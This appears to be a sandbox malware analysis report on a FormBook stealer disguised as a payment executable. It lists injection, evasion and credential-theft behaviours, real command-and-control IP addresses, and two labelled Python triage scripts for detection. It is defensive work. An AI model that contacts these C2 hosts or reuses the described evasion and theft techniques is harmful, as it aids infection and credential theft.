
Windows Analysis Report
OUTSTANDING BALANCE PAYMENT.exe

Overview

General Information

Sample name: OUTSTANDING BALANCE PAYMENT.exe
Analysis ID: 1563620
MD5: 07bd00d307952e993352e5311a7fdf90
SHA1: 05374cedfe58076e633a5968d2e29b8b5bf98e33
SHA256: 50ff8e365c4211b6de55efdb7f73beed523f47eb35b0121ce7ea68c3c0739106
Tags: exe, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Suspicious Process Parents
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • OUTSTANDING BALANCE PAYMENT.exe (PID: 3420 cmdline: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe" MD5: 07BD00D307952E993352E5311A7FDF90)
    • svchost.exe (PID: 4776 cmdline: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • QvLFrfAuvuCLc.exe (PID: 2728 cmdline: "C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • bitsadmin.exe (PID: 5128 cmdline: "C:\Windows\SysWOW64\bitsadmin.exe" MD5: F57A03FA0E654B393BB078D1C60695F3)
          • QvLFrfAuvuCLc.exe (PID: 4872 cmdline: "C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 6196 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
No configs have been found
Yara matches in memory dumps

Source | Rule | Description | Author
00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(Three further memory-dump matches are listed in the AV Detection section.)

Yara matches in unpacked PE files

Source | Rule | Description | Author
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

                System Summary

                Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe" , CommandLine: "C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe, NewProcessName: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe, OriginalFileName: C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe, ParentCommandLine: "C:\Windows\SysWOW64\bitsadmin.exe", ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 5128, ParentProcessName: bitsadmin.exe, ProcessCommandLine: "C:\Program Files (x86)\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe" , ProcessId: 4872, ProcessName: QvLFrfAuvuCLc.exe
                Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine|base64offset|contains: 4!, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ParentImage: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe, ParentProcessId: 3420, ParentProcessName: OUTSTANDING BALANCE PAYMENT.exe, ProcessCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ProcessId: 4776, ProcessName: svchost.exe
                Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", CommandLine|base64offset|contains: 4!, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ParentImage: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe, ParentProcessId: 3420, ParentProcessName: OUTSTANDING BALANCE PAYMENT.exe, ProcessCommandLine: "C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe", ProcessId: 4776, ProcessName: svchost.exe
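The Sigma hits above key on two parent/child anomalies visible in the process tree: svchost.exe started directly by the sample, carrying the sample's own path as its command line, and QvLFrfAuvuCLc.exe started by bitsadmin.exe. The Python below is an added example, not Joe Sandbox or Sigma project code: it re-implements those two checks plus a command-line/image mismatch check over process-start events transcribed from this report. The allow-list of legitimate svchost.exe parents and the list of odd parents are small illustrative subsets (an assumption), not the full lists the real Sigma rules carry.

```python
"""Process-tree triage for the parent/child anomalies in this report.
Added example: the list contents marked 'subset' are assumptions, not the
Sigma project's full lists."""
from dataclasses import dataclass
import ntpath


@dataclass(frozen=True)
class ProcStart:
    pid: int
    image: str          # Image / NewProcessName
    command_line: str   # CommandLine exactly as logged (may be quoted)
    parent_image: str   # ParentImage


# Processes that legitimately start svchost.exe (subset, assumption).
SVCHOST_PARENTS = {"services.exe", "msmpeng.exe", "mrt.exe", "rpcnet.exe"}
# Parents with no business spawning arbitrary executables (subset, assumption).
ODD_PARENTS = {"bitsadmin.exe", "winver.exe", "minesweeper.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path, surrounding quotes stripped."""
    return ntpath.basename(path.strip().strip('"')).lower()


def first_token(command_line: str) -> str:
    """Executable token of a Windows command line, honouring a quoted path."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split(" ", 1)[0]


def uncommon_svchost_parent(ev: ProcStart) -> bool:
    return (basename(ev.image) == "svchost.exe"
            and basename(ev.parent_image) not in SVCHOST_PARENTS)


def commandline_image_mismatch(ev: ProcStart) -> bool:
    """Image on disk differs from the executable named on the command line,
    the spoofed-command-line tell seen for PID 4776 in this report."""
    return basename(first_token(ev.command_line)) != basename(ev.image)


def suspicious_parent(ev: ProcStart) -> bool:
    return basename(ev.parent_image) in ODD_PARENTS


CHECKS = {
    "uncommon_svchost_parent": uncommon_svchost_parent,
    "commandline_image_mismatch": commandline_image_mismatch,
    "suspicious_parent": suspicious_parent,
}


def triage(events):
    """Map PID -> names of the checks that fired (PIDs with no hits omitted)."""
    findings = {}
    for ev in events:
        hits = [name for name, fn in CHECKS.items() if fn(ev)]
        if hits:
            findings[ev.pid] = hits
    return findings


# Transcribed from the process tree and Sigma data in this report.
SAMPLE = r"C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
BITSADMIN = r"C:\Windows\SysWOW64\bitsadmin.exe"
DROPPED = (r"C:\Program Files (x86)"
           r"\pQqiQLYjrBijlMQVckrQuteZaQpNVCZKtyWmIetDvHVFtJDxKxLQlCnMfdg\QvLFrfAuvuCLc.exe")

EVENTS = [
    ProcStart(4776, SVCHOST, f'"{SAMPLE}"', SAMPLE),       # svchost.exe with the sample's command line
    ProcStart(2728, DROPPED, f'"{DROPPED}"', SVCHOST),
    ProcStart(5128, BITSADMIN, f'"{BITSADMIN}"', DROPPED),
    ProcStart(4872, DROPPED, f'"{DROPPED}" ', BITSADMIN),  # trailing space as in the Sigma data
]

if __name__ == "__main__":
    for pid, hits in triage(EVENTS).items():
        print(pid, ", ".join(hits))
```

Run against the transcribed events, PID 4776 trips both the uncommon-parent and the command-line mismatch checks and PID 4872 trips the suspicious-parent check, matching the two Sigma matches. Note what these three checks do not cover: bitsadmin.exe (PID 5128) being launched from a randomly named directory under Program Files (x86) is a separate LOLBin-parent question that needs its own rule.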
                Suricata alerts, SID 2050745 (classtype: Malware Command and Control Activity Detected)

                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-11-27T08:53:45.960450+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49777 | 161.97.168.245 | 80 | TCP
                2024-11-27T08:54:11.282791+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49838 | 27.124.4.246 | 80 | TCP
                2024-11-27T08:54:47.655968+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49878 | 149.88.81.190 | 80 | TCP
                2024-11-27T08:55:03.326014+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49966 | 85.159.66.93 | 80 | TCP
                2024-11-27T08:55:18.327397+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50003 | 185.27.134.144 | 80 | TCP
                2024-11-27T08:55:33.466810+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50009 | 172.67.145.234 | 80 | TCP
                2024-11-27T08:55:48.702630+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50013 | 172.67.167.146 | 80 | TCP
                2024-11-27T08:56:03.874999+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50017 | 154.88.22.101 | 80 | TCP
                2024-11-27T08:56:18.770935+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50022 | 209.74.77.107 | 80 | TCP
                2024-11-27T08:56:42.065647+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50027 | 104.21.34.103 | 80 | TCP
                2024-11-27T08:56:59.824152+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50031 | 20.2.249.7 | 80 | TCP
                2024-11-27T08:57:16.023931+0100 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 50035 | 156.251.17.224 | 80 | TCP

                Suricata alerts, SID 2855465 (classtype: A Network Trojan was detected)

                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-11-27T08:53:45.960450+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49777 | 161.97.168.245 | 80 | TCP
                2024-11-27T08:54:11.282791+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49838 | 27.124.4.246 | 80 | TCP
                2024-11-27T08:54:47.655968+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49878 | 149.88.81.190 | 80 | TCP
                2024-11-27T08:55:03.326014+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 49966 | 85.159.66.93 | 80 | TCP
                2024-11-27T08:55:18.327397+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50003 | 185.27.134.144 | 80 | TCP
                2024-11-27T08:55:33.466810+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50009 | 172.67.145.234 | 80 | TCP
                2024-11-27T08:55:48.702630+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50013 | 172.67.167.146 | 80 | TCP
                2024-11-27T08:56:03.874999+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50017 | 154.88.22.101 | 80 | TCP
                2024-11-27T08:56:18.770935+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50022 | 209.74.77.107 | 80 | TCP
                2024-11-27T08:56:42.065647+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50027 | 104.21.34.103 | 80 | TCP
                2024-11-27T08:56:59.824152+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50031 | 20.2.249.7 | 80 | TCP
                2024-11-27T08:57:16.023931+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.6 | 50035 | 156.251.17.224 | 80 | TCP

                Suricata alerts, SID 2855464 (classtype: A Network Trojan was detected)

                Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                2024-11-27T08:54:03.235909+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49819 | 27.124.4.246 | 80 | TCP
                2024-11-27T08:54:05.907848+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49824 | 27.124.4.246 | 80 | TCP
                2024-11-27T08:54:08.595417+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49831 | 27.124.4.246 | 80 | TCP
                2024-11-27T08:54:19.223732+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49858 | 149.88.81.190 | 80 | TCP
                2024-11-27T08:54:21.892239+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49865 | 149.88.81.190 | 80 | TCP
                2024-11-27T08:54:24.564197+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49872 | 149.88.81.190 | 80 | TCP
                2024-11-27T08:54:55.411834+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49944 | 85.159.66.93 | 80 | TCP
                2024-11-27T08:54:58.079931+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49950 | 85.159.66.93 | 80 | TCP
                2024-11-27T08:55:00.751872+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49958 | 85.159.66.93 | 80 | TCP
                2024-11-27T08:55:10.226446+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49983 | 185.27.134.144 | 80 | TCP
                2024-11-27T08:55:12.937312+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49990 | 185.27.134.144 | 80 | TCP
                2024-11-27T08:55:15.611282+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 49997 | 185.27.134.144 | 80 | TCP
                2024-11-27T08:55:25.329251+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50006 | 172.67.145.234 | 80 | TCP
                2024-11-27T08:55:28.178587+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50007 | 172.67.145.234 | 80 | TCP
                2024-11-27T08:55:30.870401+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50008 | 172.67.145.234 | 80 | TCP
                2024-11-27T08:55:40.464204+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50010 | 172.67.167.146 | 80 | TCP
                2024-11-27T08:55:43.124581+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50011 | 172.67.167.146 | 80 | TCP
                2024-11-27T08:55:45.948010+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50012 | 172.67.167.146 | 80 | TCP
                2024-11-27T08:55:55.802009+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50014 | 154.88.22.101 | 80 | TCP
                2024-11-27T08:55:58.471009+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50015 | 154.88.22.101 | 80 | TCP
                2024-11-27T08:56:01.142486+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50016 | 154.88.22.101 | 80 | TCP
                2024-11-27T08:56:10.717750+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50019 | 209.74.77.107 | 80 | TCP
                2024-11-27T08:56:13.425645+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50020 | 209.74.77.107 | 80 | TCP
                2024-11-27T08:56:16.168443+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50021 | 209.74.77.107 | 80 | TCP
                2024-11-27T08:56:34.006573+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50023 | 104.21.34.103 | 80 | TCP
                2024-11-27T08:56:36.721112+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50025 | 104.21.34.103 | 80 | TCP
                2024-11-27T08:56:39.338499+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50026 | 104.21.34.103 | 80 | TCP
                2024-11-27T08:56:51.697619+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50028 | 20.2.249.7 | 80 | TCP
                2024-11-27T08:56:54.376808+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50029 | 20.2.249.7 | 80 | TCP
                2024-11-27T08:56:57.065492+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50030 | 20.2.249.7 | 80 | TCP
                2024-11-27T08:57:07.048896+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50032 | 156.251.17.224 | 80 | TCP
                2024-11-27T08:57:09.720988+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50033 | 156.251.17.224 | 80 | TCP
                2024-11-27T08:57:12.400972+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.6 | 50034 | 156.251.17.224 | 80 | TCP
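Read together, the three alert tables show one source host working through twelve port-80 destinations in turn: per host, three POST check-ins (SID 2855464) a few seconds apart and then a GET check-in (SIDs 2050745 and 2855465), with the next host contacted roughly 15 seconds later. The Python below is an added example, not Joe Sandbox code, that reduces such a table to one record per C2 host, measures the rotation period, and emits the IOC list; the ALERTS list is transcribed from the tables above (not a live capture), and the thresholds in verdict() are assumptions, not FormBook constants.

```python
"""Check-in cadence triage over the Suricata alerts in this report.
Added example; ALERTS is transcribed from the three alert tables above."""
from datetime import datetime
from statistics import median

GET_SIDS = {2050745, 2855465}   # FormBook CnC Checkin (GET) M5 / M2
POST_SID = 2855464              # FormBook CnC Checkin (POST) M3

# (destination IP, GET check-in time, POST check-in times). Every alert has
# source 192.168.2.6, destination port 80/TCP and date 2024-11-27 (+0100).
ALERTS = [
    ("161.97.168.245", "08:53:45.960450", ()),
    ("27.124.4.246",   "08:54:11.282791", ("08:54:03.235909", "08:54:05.907848", "08:54:08.595417")),
    ("149.88.81.190",  "08:54:47.655968", ("08:54:19.223732", "08:54:21.892239", "08:54:24.564197")),
    ("85.159.66.93",   "08:55:03.326014", ("08:54:55.411834", "08:54:58.079931", "08:55:00.751872")),
    ("185.27.134.144", "08:55:18.327397", ("08:55:10.226446", "08:55:12.937312", "08:55:15.611282")),
    ("172.67.145.234", "08:55:33.466810", ("08:55:25.329251", "08:55:28.178587", "08:55:30.870401")),
    ("172.67.167.146", "08:55:48.702630", ("08:55:40.464204", "08:55:43.124581", "08:55:45.948010")),
    ("154.88.22.101",  "08:56:03.874999", ("08:55:55.802009", "08:55:58.471009", "08:56:01.142486")),
    ("209.74.77.107",  "08:56:18.770935", ("08:56:10.717750", "08:56:13.425645", "08:56:16.168443")),
    ("104.21.34.103",  "08:56:42.065647", ("08:56:34.006573", "08:56:36.721112", "08:56:39.338499")),
    ("20.2.249.7",     "08:56:59.824152", ("08:56:51.697619", "08:56:54.376808", "08:56:57.065492")),
    ("156.251.17.224", "08:57:16.023931", ("08:57:07.048896", "08:57:09.720988", "08:57:12.400972")),
]


def _t(hms: str) -> datetime:
    return datetime.strptime(hms, "%H:%M:%S.%f")


def checkin_rounds(alerts):
    """One record per C2 host, ordered by first contact."""
    rounds = []
    for dst, get_ts, post_ts in alerts:
        get = _t(get_ts)
        posts = [_t(x) for x in post_ts]
        rounds.append({
            "dst": dst,
            "first": min(posts + [get]),
            "get": get,
            "posts": len(posts),
            "posts_before_get": all(p < get for p in posts),
        })
    rounds.sort(key=lambda r: r["first"])
    return rounds


def rotation_gaps(rounds):
    """Seconds between successive GET check-ins, i.e. the host rotation period."""
    gets = [r["get"] for r in rounds]
    return [(b - a).total_seconds() for a, b in zip(gets, gets[1:])]


def verdict(alerts, min_hosts=5, max_median_gap=60.0):
    """Flag one source rotating quickly through many C2 hosts (thresholds are assumptions)."""
    rounds = checkin_rounds(alerts)
    gaps = rotation_gaps(rounds)
    med = median(gaps) if gaps else None
    return {
        "signatures": {"get": sorted(GET_SIDS), "post": POST_SID},
        "hosts": len(rounds),
        "median_gap_s": round(med, 2) if med is not None else None,
        "posts_per_host": sorted({r["posts"] for r in rounds}),
        "round_robin": len(rounds) >= min_hosts and med is not None and med <= max_median_gap,
        "iocs": [f'{r["dst"]}:80' for r in rounds],
    }


if __name__ == "__main__":
    for key, value in verdict(ALERTS).items():
        print(f"{key}: {value}")
```

On the transcribed data this reports 12 hosts, a median rotation gap of about 15.7 s, 0 or 3 POSTs per host (the first host, 161.97.168.245, produced only the GET alerts) and POSTs always preceding the GET. The ordered IOC list is what goes to the proxy or firewall block list; the cadence figure is the more durable detection, since the hosts themselves rotate between campaigns.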

                AV Detection

                Source: OUTSTANDING BALANCE PAYMENT.exe; ReversingLabs: Detection: 39%
                Source: Yara match; File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match; File source: 00000005.00000002.4596765676.0000000003510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2392608967.0000000007B40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000006.00000002.4599520546.0000000005600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.4592072566.0000000003010000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2379572846.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000005.00000002.4596524893.00000000034C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000004.00000002.4597050581.0000000002740000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000002.00000002.2384044672.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
                Source: OUTSTANDING BALANCE PAYMENT.exe; Joe Sandbox ML: detected
                Source: OUTSTANDING BALANCE PAYMENT.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: bitsadmin.pdb source: svchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: bitsadmin.pdbGCTL source: svchost.exe, 00000002.00000003.2348113087.0000000003048000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347953468.000000000301A000.00000004.00000020.00020000.00000000.sdmp, QvLFrfAuvuCLc.exe, 00000004.00000002.4595971404.0000000000D08000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QvLFrfAuvuCLc.exe, 00000004.00000000.2302797977.000000000091E000.00000002.00000001.01000000.00000005.sdmp, QvLFrfAuvuCLc.exe, 00000006.00000000.2455000791.000000000091E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144143850.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2146563171.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2286820867.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284795980.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2379551028.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.0000000003720000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2387630149.0000000003577000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2144143850.0000000003BE0000.00000004.00001000.00020000.00000000.sdmp, OUTSTANDING BALANCE PAYMENT.exe, 00000000.00000003.2146563171.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2286820867.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2383513975.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2284795980.0000000003200000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2379551028.00000000033C1000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.0000000003720000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000002.4597260265.00000000038BE000.00000040.00001000.00020000.00000000.sdmp, bitsadmin.exe, 00000005.00000003.2387630149.0000000003577000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe; Code function: 0_2_002C6CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_002C6CA9
                Source: C:\Users\user\Desktop\OUTSTANDING BALANCE PAYMENT.exe; Code function: 0_2_002C60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_002C60DD
